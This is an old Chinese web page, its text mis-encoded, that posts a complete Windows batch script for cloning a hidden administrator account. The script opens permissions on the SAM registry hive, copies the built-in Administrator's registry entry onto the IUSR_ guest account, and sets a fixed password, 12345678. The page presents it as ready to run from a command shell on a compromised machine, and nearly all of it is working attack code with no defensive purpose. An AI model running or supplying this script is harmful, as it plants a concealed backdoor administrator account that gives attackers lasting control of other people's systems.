windows 復(fù)制隱藏帳號(hào)完全批處理
更新時(shí)間:2009年09月30日 12:19:18 作者:
其實(shí)就是注冊(cè)表里復(fù)制管理員權(quán)限到普通用戶那個(gè)操作,不過(guò)畢竟批處理容易在cmdshell里實(shí)現(xiàn),貼出來(lái)吧。
復(fù)制代碼 代碼如下:
echo off
setlocal enabledelayedexpansion
echo %computername%
echo HKEY_LOCAL_MACHINE\SAM\SAM [1 17] >"%windir%\..\1.reg"
regini "%windir%\..\1.reg"
regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\IUSR_%computername%
rem unicode ->ascii
type "%windir%\..\1.reg" >"%windir%\..\2.reg"
del /q "%windir%\..\1.reg"
rem find IUSR_%computername% 的對(duì)應(yīng)id
for /F "delims=( tokens=1-5* skip=3" %%a in (%windir%\..\2.reg) do set iusr_id=%%b
del /q "%windir%\..\2.reg"
rem export administrator register
regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
type "%windir%\..\1.reg" >"%windir%\..\2.reg"
del /q "%windir%\..\1.reg"
rem replace 1fx->iusr_id
for /f "tokens=* delims=:" %%i in (%windir%\..\2.reg) do (
for /f "tokens=*" %%j in ("%%i") do (
set TMP=%%j
set "TMP=!TMP:000001F4=00000%iusr_id:~0,3%!"
echo !TMP!>>%windir%\..\1.reg
)
)
regedit /s %windir%\..\1.reg
del /q %windir%\..\1.reg
del /q %windir%\..\2.reg
echo HKEY_LOCAL_MACHINE\SAM\SAM [17] >"%windir%\..\1.reg"
regini "%windir%\..\1.reg"
del /q "%windir%\..\1.reg"
net user IUSR_%computername% 12345678
克隆出來(lái)的用戶名是固定的,隨便變換的話要改代碼
相關(guān)文章
Chcp 顯示活動(dòng)控制臺(tái)代碼頁(yè)數(shù)量,或更改該控制臺(tái)的活動(dòng)控制臺(tái)代碼頁(yè)
Chcp 顯示活動(dòng)控制臺(tái)代碼頁(yè)數(shù)量,或更改該控制臺(tái)的活動(dòng)控制臺(tái)代碼頁(yè)...2007-09-09通過(guò)批處理實(shí)現(xiàn)刪除運(yùn)行、查找等處的歷史記錄的代碼
刪除運(yùn)行、查找等處的歷史記錄,其實(shí)就是通過(guò)操作批處理實(shí)現(xiàn),具體的介紹參考下面的介紹2012-05-05BAT腳本之核心技巧:詳解IF語(yǔ)句的使用方法與實(shí)例
如果你想要在Bat編程語(yǔ)言中使用條件語(yǔ)句,那么這篇指南將會(huì)為你介紹如何使用IF語(yǔ)句,?IF語(yǔ)句是任何編程語(yǔ)言中都不可或缺的一部分?-?它使您能夠基于特定的條件執(zhí)行某些代碼塊或跳過(guò)它們,在這篇簡(jiǎn)短的指南里,我們將向你展示如何在Bat中編寫IF語(yǔ)句并給出一些示例來(lái)說(shuō)明其用法2024-02-02